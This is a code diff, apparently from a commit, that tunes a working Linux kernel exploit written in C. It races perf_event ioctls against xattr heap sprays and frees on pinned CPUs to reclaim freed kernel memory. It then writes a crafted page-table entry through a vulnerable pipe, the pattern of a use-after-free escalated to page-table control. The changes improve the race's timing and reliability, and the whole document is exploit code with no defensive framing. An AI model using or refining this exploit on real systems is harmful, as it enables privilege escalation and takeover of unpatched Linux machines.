@@ -285,6 +285,7 @@ void print_proc_self_maps_raw() {
285
285
close (fd );
286
286
}
287
287
288
+ int counter_init = 0 ;
288
289
void race (int group_leader ) { // caller must have ownership of the group
289
290
int pipefd [2 ];
290
291
uint64_t buf [0x2000 ] = {0 , };
@@ -299,33 +300,39 @@ void race(int group_leader) { // caller must have ownership of the group
299
300
perror ("reclaim failed" );
300
301
exit (EXIT_FAILURE );
301
302
}
303
+
302
304
pid_t child_pid = fork ();
303
305
if (child_pid == 0 ) { // child read
304
306
_pin_to_cpu (CPU_A );
305
307
sched_yield ();
306
308
DEBUG_PRINT ();
307
309
raise (SIGSTOP ); // stop - keep same generation
308
310
for (int i = 0 ; i < 512 + 511 ; i ++ ){
309
- ioctl (siblings [i ], PERF_EVENT_IOC_RESET , 0 );
311
+ ioctl (siblings [i ], PERF_EVENT_IOC_RESET , PERF_IOC_FLAG_GROUP );
310
312
ioctl (siblings [i ], PERF_EVENT_IOC_ENABLE , 0 );
311
313
}
312
314
if (close (siblings [100 ]) < 0 ) {
313
315
perror ("close failed" );
314
316
exit (EXIT_FAILURE );
317
+ }
318
+ char * addr ;
319
+ if (!counter_init ) { // preserving previously recorded counters.
320
+ puts ("[+] Initializing Counters" );
321
+ addr = (char * )mmap (NULL , 0x1000 * 0x80 , PROT_READ | PROT_WRITE , MAP_PRIVATE | MAP_ANONYMOUS , -1 , 0 );
322
+ for (int i = 0 ; i < 0x80 ; i ++ ){
323
+ ioctl (group_leader , PERF_EVENT_IOC_ENABLE , 0 );
324
+ addr [0x1000 * i ] = 0x41 ;
325
+ ioctl (group_leader , PERF_EVENT_IOC_DISABLE , 0 );
326
+ }
315
327
}
316
- ioctl (group_leader , PERF_EVENT_IOC_RESET , 0 );
317
-
318
- char * addr = (char * )mmap (NULL , 0x1000 * 0x80 , PROT_READ | PROT_WRITE , MAP_PRIVATE | MAP_ANONYMOUS , -1 , 0 );
319
- for (int i = 0 ; i < 0x80 ; i ++ ){
320
- ioctl (group_leader , PERF_EVENT_IOC_ENABLE , 0 );
321
- addr [0x1000 * i ] = 0x41 ;
322
- ioctl (group_leader , PERF_EVENT_IOC_DISABLE , 0 );
323
- }
328
+
324
329
write (pipefd [1 ], buffer , 1 ); // sync point A
325
330
remove_xattr ("security.x12296_10" , 1 );
331
+ // x10 reclaimed by CPU_B is now released on CPU_A
326
332
for (int _ = 0 ; _ < 1 ; _ ++ ) {
327
333
read (group_leader , buf , sizeof (buf ));
328
334
}
335
+ sched_yield ();
329
336
remove_xattr ("security.ssiphim" , 1 );
330
337
if (setxattr ("/tmp/x1" , "security.x12296_10" , buf , 0x3008 , 0 ) < 0 ) {
331
338
perror ("reclaim failed" );
@@ -334,7 +341,9 @@ void race(int group_leader) { // caller must have ownership of the group
334
341
uint64_t pte = 0x8000000000000067 ;
335
342
write (vuln_pipe [1 ], & pte , 8 );
336
343
read (vuln_pipe [0 ], & pte , 8 );
337
- munmap (addr , 0x1000 * 0x80 );
344
+ if (!counter_init ) {
345
+ munmap (addr , 0x1000 * 0x80 );
346
+ }
338
347
exit (0 );
339
348
}
340
349
else if (child_pid > 0 ) { // parent
@@ -377,6 +386,8 @@ void race(int group_leader) { // caller must have ownership of the group
377
386
}
378
387
// DEBUGDEBUG - not
379
388
waitpid (child_pid , & status , 0 );
389
+ if (!counter_init )
390
+ counter_init = 1 ;
380
391
381
392
close (pipefd [0 ]);
382
393
close (pipefd [1 ]);
@@ -451,14 +462,21 @@ pid_t add_siblings_fork(int group_leader, int cnt, int ctx_pid, int is_racer){
451
462
exit (EXIT_FAILURE );
452
463
}
453
464
if (is_racer ) {
465
+ _pin_to_cpu (CPU_B );
466
+ sched_yield ();
467
+ // Minimizing heap noise.
468
+ // child will be running on CPU_A
454
469
spray_xattr_page (0x3008 , 12 , 1 ); // 12296
455
470
spray_xattr_page (0x4008 , 2 , 1 ); // 16392
456
471
remove_xattr ("security.x16392_0" , 1 );
457
472
remove_xattr ("security.x16392_1" , 1 );
458
473
remove_xattr ("security.x12296_5" , 1 );
459
474
remove_xattr ("security.x12296_6" , 1 );
475
+ sched_yield ();
476
+ // this reclaim process must be atomic
460
477
remove_xattr ("security.x12296_11" , 1 );
461
478
resize_pipe (vuln_pipe [1 ], 0x1000 * 220 );
479
+ sched_yield ();
462
480
remove_xattr ("security.x12296_10" , 1 );
463
481
remove_xattr ("security.x12296_7" , 1 );
464
482
if (setxattr ("/tmp/x1" , "security.x12296_10" , buf , 0x3008 , 0 ) < 0 ) {
0 commit comments